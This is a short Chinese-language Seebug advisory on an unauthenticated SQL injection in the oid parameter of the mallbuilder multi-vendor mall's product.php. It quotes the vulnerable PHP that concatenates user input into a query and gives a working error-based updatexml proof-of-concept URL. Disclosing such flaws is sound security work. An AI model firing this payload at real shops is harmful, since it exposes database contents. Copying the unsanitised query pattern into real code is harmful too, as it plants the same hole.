mallbuilder多用户商城 /module/product/admin/product.php 参数oid SQL注入漏洞

2016-06-10T00:00:00
ID SSV:91816
Type seebug
Reporter kikay
Modified 2016-06-10T00:00:00

Description

0x01漏洞简介

mallbuilder多用户商城系统在页面/module/product/admin/product.php处的参数oid 存在SQL注入漏洞。远程攻击者无需登陆,可以结合回显报错等方式,利用该漏洞执行SQL指令。

0x02漏洞详情

看到module/product/admin/product.php

``` <?php

if(!empty($_GET['tuikuan'])&&!empty($_GET['oid']))

{

include_once($config['webroot']."/module/product/includes/plugin_order_class.php");

$order=new order();

$order-&gt;set_order_statu($_GET['oid'],6);

}

$sqld="select * from ".ORDER." where order_id=".$_GET['oid']; ``` 然后构造

http://127.0.0.1/mallbuilderv5.8/?m=product&s=admin/order_detail&oid=updatexml(1,concat(0x5c,user()),1)

0x03漏洞证明

直接出数据

0x04修复方案

过滤。